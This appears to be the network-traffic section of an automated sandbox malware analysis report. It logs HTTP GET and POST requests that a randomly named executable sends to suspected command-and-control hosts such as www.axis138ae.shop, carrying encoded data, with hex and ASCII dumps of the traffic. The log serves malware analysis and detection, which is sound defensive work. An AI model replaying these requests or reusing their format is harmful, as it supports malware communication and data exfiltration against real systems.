                                                                                                                          Data Ascii: V8=orBhwzXBa2iiQHheA03VTcycQo7+BMbQZq8A4A2jiEch96XJ/RndSgxfSxIIpN+Y7hBUmzk50UImU3xaJo06atRrPjiFwoA127c4C05UW4KdCnjuAIr62h5Ab5q7D2aL1A6sWYk1xpQ23lSRh0pGgcTOo7JzvWaQTipXD2OLusesiLDxD4M/AXx8WQICmq0lOKawb1jNmEdkvVkih+orU6Sj8grJT3M+9X1HMqVTxwn/3rKONkslGZEYF8NojjPeztFa08W+4miCg6X0Wmsop596PkZkjBAhBWQLiSiwgwXbK2K7y4gYYSmSMFDRE6rlcHHvKyLo6yIcUPPu3LtcsN0eUCRRFlqhO5MrWJnFW0m/igfb2r5bywt50fzhDqhAM/SAET0RapCUKGNwfHMOkgho0sfeUq9+2bBD59hDJcraJjykzf+QNZJF/piJWyn0ENgVvqHE+Vdxjt4EIeiBZMvnhmB7TEbgtfCU8K0H9ANIByKaHqkdRj/qH8Ypc+j5+06rqGIbme9ECLZ/IK8QwlCzkt58S4no+3CbRMJMapJ/LG8bSmqi/bjTODDd4QngcbrQvCG/FPk/Baahxk+EK9icnGDI4UHs5aEPzTt5K7VTYe+IreRDnFWz7u5ZSZejjY4UfZ0bWnMu0dAgQlxOvLCjpye6GUmi3wNVRf2VuLQQOSgQcSVsGdu8jc4y6pFgD9Q03dNqx7+L0Zb+zGfXZiYfXE9rZh2rhyOcWOYv16lAzZv+CqRzMTg7yAJxv0JXDFXa6uAlZhkNK9XHHeZCEhd/6Jfyt3UQRmwwqmqPpW24X+h7rENNliWivdC9/sd+jFfTVHL5FnEPMsEG+QLNjFYc4c92wiCIYqchpoMvifiWFqSv6DXrILUiTtYITck7OBXU+7wRlynGwLa0s3+s1AGfRuxJ/DmbA/YvpgP0P9JIAQIlF0gZoqLQk0YvaKN6LKHvPFwmnBvQDkFudQmsGz2RJyZrKSJYZERXpKOkfLmFL8LLY [TRUNCATED]
                                                                                                                          Jan 10, 2025 16:44:00.768687010 CET493INHTTP/1.1 302 Found
                                                                                                                          Date: Fri, 10 Jan 2025 15:44:00 GMT
                                                                                                                          Server: Apache
                                                                                                                          Location: http://maximumgroup.co.za/tw42/
                                                                                                                          Content-Length: 290
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 74 77 34 32 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/tw42/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          32192.168.2.550008136.243.64.147802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:44:02.694971085 CET584OUTGET /tw42/?V8=lppBzHasG2q3W2gwBEigKs+lYs+CAuXKSLpv0GvBrwIC17Gf2xLaVk86ThwJgseC0DRvoxJH/zAsXU58KuU4W+pKTj7Ns/0A3sApM0dQZei9OXaCVa2j9SlaFImncTaD0Q==&Bb6h7=gBiPvnrHa HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.100millionjobs.africa
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Jan 10, 2025 16:44:03.378036022 CET801INHTTP/1.1 302 Found
                                                                                                                          Date: Fri, 10 Jan 2025 15:44:03 GMT
                                                                                                                          Server: Apache
                                                                                                                          Location: http://maximumgroup.co.za/tw42/?V8=lppBzHasG2q3W2gwBEigKs+lYs+CAuXKSLpv0GvBrwIC17Gf2xLaVk86ThwJgseC0DRvoxJH/zAsXU58KuU4W+pKTj7Ns/0A3sApM0dQZei9OXaCVa2j9SlaFImncTaD0Q==&Bb6h7=gBiPvnrHa
                                                                                                                          Content-Length: 446
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 74 77 34 32 2f 3f 56 38 3d 6c 70 70 42 7a 48 61 73 47 32 71 33 57 32 67 77 42 45 69 67 4b 73 2b 6c 59 73 2b 43 41 75 58 4b 53 4c 70 76 30 47 76 42 72 77 49 43 31 37 47 66 32 78 4c 61 56 6b 38 36 54 68 77 4a 67 73 65 43 30 44 52 76 6f 78 4a 48 2f 7a 41 73 58 55 35 38 4b 75 55 34 57 2b 70 4b 54 6a 37 4e 73 2f 30 41 33 73 41 70 4d 30 64 51 5a 65 69 39 4f 58 61 43 56 61 32 6a 39 53 6c 61 46 49 6d 6e 63 54 61 44 30 51 3d 3d 26 61 6d 70 3b 42 62 36 68 37 3d 67 42 69 50 76 6e 72 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/tw42/?V8=lppBzHasG2q3W2gwBEigKs+lYs+CAuXKSLpv0GvBrwIC17Gf2xLaVk86ThwJgseC0DRvoxJH/zAsXU58KuU4W+pKTj7Ns/0A3sApM0dQZei9OXaCVa2j9SlaFImncTaD0Q==&amp;Bb6h7=gBiPvnrHa">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          33192.168.2.550009104.21.48.1802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:44:16.552077055 CET833OUTPOST /j2vs/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.axis138ae.shop
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 203
                                                                                                                          Origin: http://www.axis138ae.shop
                                                                                                                          Referer: http://www.axis138ae.shop/j2vs/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 6c 68 36 66 31 35 73 41 78 42 37 71 41 73 65 64 6d 4a 4a 41 69 30 61 59 6e 56 42 66 43 4c 76 36 41 59 39 76 67 6f 65 65 71 70 69 76 47 52 72 75 76 63 66 75 78 69 4d 64 30 32 73 7a 38 2f 6f 4a 62 32 47 49 38 61 6e 4b 51 37 32 36 6c 31 36 63 68 42 2f 7a 62 49 32 2b 4f 56 6d 74 74 79 61 70 71 54 32 72 61 68 7a 51 70 64 6a 31 70 64 59 6e 66 61 56 7a 72 4c 52 41 44 38 67 6b 74 63 47 64 55 73 4d 61 6b 33 73 59 54 66 71 46 69 6b 31 58 77 6f 72 68 62 42 4e 72 4e 53 79 68 2f 49 67 51 47 6a 33 49 4c 73 4e 44 33 45 74 71 63 77 6f 58 36 45 45 4d 39 30 68 30 32 63 49 57 42 76 6f 6f 77 57 37 61 74 4f 51 3d
                                                                                                                          Data Ascii: V8=lh6f15sAxB7qAsedmJJAi0aYnVBfCLv6AY9vgoeeqpivGRruvcfuxiMd02sz8/oJb2GI8anKQ726l16chB/zbI2+OVmttyapqT2rahzQpdj1pdYnfaVzrLRAD8gktcGdUsMak3sYTfqFik1XworhbBNrNSyh/IgQGj3ILsND3EtqcwoX6EEM90h02cIWBvoowW7atOQ=
                                                                                                                          Jan 10, 2025 16:44:17.105659008 CET1091INHTTP/1.1 301 Moved Permanently
                                                                                                                          Date: Fri, 10 Jan 2025 15:44:17 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 167
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=3600
                                                                                                                          Expires: Fri, 10 Jan 2025 16:44:17 GMT
                                                                                                                          Location: https://www.axis138ae.shop/j2vs/
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kQAhbx09aLKxGu9HfgAhbBJ%2BRxfD11UfHMbdhQLqod8WlPGR7GNAPlJOR%2Bw1%2Bn%2Fr8JLzYVGbLimi8oAbVK4I2Hb0Exd2d%2FU0ekXoNqnbwBsmfVsphhOuUoJwNgCCttbQoKUiP4c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ffdc99a58768c15-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=40587&min_rtt=40587&rtt_var=20293&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=833&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          34192.168.2.550010104.21.48.1802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:44:19.122030973 CET853OUTPOST /j2vs/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.axis138ae.shop
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 223
                                                                                                                          Origin: http://www.axis138ae.shop
                                                                                                                          Referer: http://www.axis138ae.shop/j2vs/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 6c 68 36 66 31 35 73 41 78 42 37 71 47 50 57 64 6b 75 6c 41 7a 6b 61 66 69 56 42 66 58 37 76 2b 41 59 68 76 67 70 61 4f 71 37 57 76 49 56 37 75 75 5a 2f 75 79 69 4d 64 2b 57 73 38 68 50 6f 53 62 32 4b 71 38 5a 2f 4b 51 37 69 36 6c 78 2b 63 68 79 58 30 64 59 32 47 56 6c 6d 56 6a 53 61 70 71 54 32 72 61 68 57 4c 70 5a 48 31 71 73 6f 6e 65 37 56 73 71 4c 52 48 56 73 67 6b 70 63 47 52 55 73 4d 73 6b 79 52 7a 54 5a 6d 46 69 6d 64 58 78 36 44 69 56 42 4e 70 53 69 7a 68 78 74 64 38 4d 6c 7a 58 4a 66 55 34 73 79 38 53 51 6d 5a 39 67 6d 4d 6b 75 55 4e 4d 6d 50 41 68 51 66 4a 42 71 31 72 71 7a 5a 48 51 4e 4f 53 47 4f 73 42 58 4f 4f 6f 43 36 65 71 49 50 52 6a 55
                                                                                                                          Data Ascii: V8=lh6f15sAxB7qGPWdkulAzkafiVBfX7v+AYhvgpaOq7WvIV7uuZ/uyiMd+Ws8hPoSb2Kq8Z/KQ7i6lx+chyX0dY2GVlmVjSapqT2rahWLpZH1qsone7VsqLRHVsgkpcGRUsMskyRzTZmFimdXx6DiVBNpSizhxtd8MlzXJfU4sy8SQmZ9gmMkuUNMmPAhQfJBq1rqzZHQNOSGOsBXOOoC6eqIPRjU
                                                                                                                          Jan 10, 2025 16:44:19.551476955 CET1081INHTTP/1.1 301 Moved Permanently
                                                                                                                          Date: Fri, 10 Jan 2025 15:44:19 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 167
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=3600
                                                                                                                          Expires: Fri, 10 Jan 2025 16:44:19 GMT
                                                                                                                          Location: https://www.axis138ae.shop/j2vs/
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y3pSlD2i%2FGGRFLc2kxr%2B2g49WBiLqUizF65bU43Uzf4GL0HXv369dUMmNNeFNFlzEakp2YB3POadsPdstjzekkSUVsr10ntWmtsPU6KxNP8Z9WtRUNqPdVGbyjaaLQQxTwFRD3M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ffdc9a9dc6a42e9-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1764&min_rtt=1764&rtt_var=882&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=853&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          35192.168.2.550011104.21.48.1802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:44:21.671034098 CET1870OUTPOST /j2vs/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.axis138ae.shop
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 1239
                                                                                                                          Origin: http://www.axis138ae.shop
                                                                                                                          Referer: http://www.axis138ae.shop/j2vs/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 6c 68 36 66 31 35 73 41 78 42 37 71 47 50 57 64 6b 75 6c 41 7a 6b 61 66 69 56 42 66 58 37 76 2b 41 59 68 76 67 70 61 4f 71 37 4f 76 49 6e 7a 75 76 34 2f 75 7a 69 4d 64 39 57 73 6f 68 50 70 43 62 32 43 75 38 65 32 6f 51 34 61 36 33 43 32 63 78 44 58 30 54 59 32 47 64 46 6d 75 74 79 62 72 71 54 6e 44 61 68 47 4c 70 5a 48 31 71 75 67 6e 49 61 56 73 6e 72 52 41 44 38 67 6f 74 63 47 39 55 73 55 53 6b 7a 42 46 54 70 47 46 6a 47 74 58 33 4a 72 69 64 42 4e 76 52 69 7a 50 78 74 5a 6a 4d 6c 48 54 4a 63 49 43 73 31 51 53 56 68 77 56 38 6e 63 2b 31 69 74 6a 6b 38 55 79 4f 71 30 6e 6e 57 54 48 76 62 58 79 58 37 71 57 41 5a 4a 70 46 66 56 6f 72 4b 57 4f 47 6c 47 38 6f 4d 4f 31 34 7a 38 55 73 75 32 54 38 6f 47 38 36 4b 63 4e 30 7a 48 36 6f 4c 68 56 59 37 57 72 50 31 71 69 4c 7a 76 6f 36 42 77 46 43 62 4a 72 36 41 54 7a 31 65 43 65 61 74 32 71 32 58 6d 68 72 69 64 67 32 2f 59 35 30 6d 36 55 6d 33 52 58 6d 75 4b 57 64 77 43 70 56 76 68 45 38 4a 54 50 2b 32 71 69 4d 6a 52 7a 54 4b 4b 64 4e 5a 5a 44 72 6f 54 [TRUNCATED]
                                                                                                                          Data Ascii: V8=lh6f15sAxB7qGPWdkulAzkafiVBfX7v+AYhvgpaOq7OvInzuv4/uziMd9WsohPpCb2Cu8e2oQ4a63C2cxDX0TY2GdFmutybrqTnDahGLpZH1qugnIaVsnrRAD8gotcG9UsUSkzBFTpGFjGtX3JridBNvRizPxtZjMlHTJcICs1QSVhwV8nc+1itjk8UyOq0nnWTHvbXyX7qWAZJpFfVorKWOGlG8oMO14z8Usu2T8oG86KcN0zH6oLhVY7WrP1qiLzvo6BwFCbJr6ATz1eCeat2q2Xmhridg2/Y50m6Um3RXmuKWdwCpVvhE8JTP+2qiMjRzTKKdNZZDroT2uAFi4McpEzDmx34EzUsIii7/XR0mV5MRYtNmbtc39M5tKhfOqLswfumMpF0cZF+qL3ZiDBvH997t9xfyjotMWERSFUsDEEc2Y74mlP0igbnuNINXeC78XE1sQOtR6uCn7RnmA3LHnHv8AeD8loBrYftx0W8wvB3jjQ+pspYmlyU1BSucitGbJfFLHubzL8eA7dLKA2407JYMNzDB0fIYVX0E2IYdXzi25LevT5AWQb0CiHTogXy0pcGOmWn/MBOdwFFK3Yd6wWxHiOscvge1RAs2UosRA4iDLbf9ZipxFrk9lKWmOI6Qt2LDs56XRi7vqZ8lTSfmsemInyvU2+vtVfXjCFvCP7JyPDlho7tm2m6ZD/pZbgJgOO+mLxSkQAZKqIunRDeCGig/kT+CMahM+G9Fe2ZX2vWOU/6z0+1JALnR9XdVWHHAN2gB4zUzuRWG47JecBKhNEWxD9AF1FW3czBzr60wefxm6ew++5dK7dzvmvN72lCqup1yuXXRrYwWj0AOJAU7xk7yO00lgVW1lEobuwxK9Hp+aQvxa++TqUqZiRFfY1CST9TO8c3m5P24wvD5Eh9ym7/H8M/nHCn71Mx8ZRV3V1Oq6jGfxHQ7VUuffI1S/sTKyMTNXEkszqzsZ85ShJBG3aLI9WKzeo6Q1efDlN91MaVmy [TRUNCATED]
                                                                                                                          Jan 10, 2025 16:44:22.126920938 CET1082INHTTP/1.1 301 Moved Permanently
                                                                                                                          Date: Fri, 10 Jan 2025 15:44:22 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 167
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=3600
                                                                                                                          Expires: Fri, 10 Jan 2025 16:44:22 GMT
                                                                                                                          Location: https://www.axis138ae.shop/j2vs/
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wHv68tVpKHprZd3Lzo47AgpqSgTnMgQxXj%2B9sQzkGWBih3TddwvKqX02I7lGUjOfscAaE7Up7MJCJR3OlztaQrBDdCfR12Cm1wCvLfzYkAUxUlwmgvx5ztWB0am5s%2FFkZbPhETQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ffdc9b9ed6c43be-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1552&min_rtt=1552&rtt_var=776&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1870&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          36192.168.2.550012104.21.48.1802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:44:24.208802938 CET577OUTGET /j2vs/?Bb6h7=gBiPvnrHa&V8=ojS/2P5nrhKWG869xfViz2uaiQ4dB6fmN9sQwMDG5q6PFmCkgI7u5WRyoS939Z0WQWWR6oSqfY2a6i6yoynlWLywOB6FnF6t61mCd33fp8fgqeNJIahdroNOItErrJD4XA== HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.axis138ae.shop
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Jan 10, 2025 16:44:24.660492897 CET1214INHTTP/1.1 301 Moved Permanently
                                                                                                                          Date: Fri, 10 Jan 2025 15:44:24 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 167
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=3600
                                                                                                                          Expires: Fri, 10 Jan 2025 16:44:24 GMT
                                                                                                                          Location: https://www.axis138ae.shop/j2vs/?Bb6h7=gBiPvnrHa&V8=ojS/2P5nrhKWG869xfViz2uaiQ4dB6fmN9sQwMDG5q6PFmCkgI7u5WRyoS939Z0WQWWR6oSqfY2a6i6yoynlWLywOB6FnF6t61mCd33fp8fgqeNJIahdroNOItErrJD4XA==
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lpmlF7gx7MHpAH8gVFhmHN%2BXEXchCg3L2e69H2Hw1EWqlH11BKoK3aAkjVvh%2BfFvWfZlM%2FTFszyMmxZvTSu89vzs9HWLA07afRbdiGr%2Fb37FfF1EYBCP9kJbKUFSm9i5KUTOlOo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ffdc9c9cf1fc461-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1710&rtt_var=855&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=577&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          37192.168.2.550013134.122.133.80802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
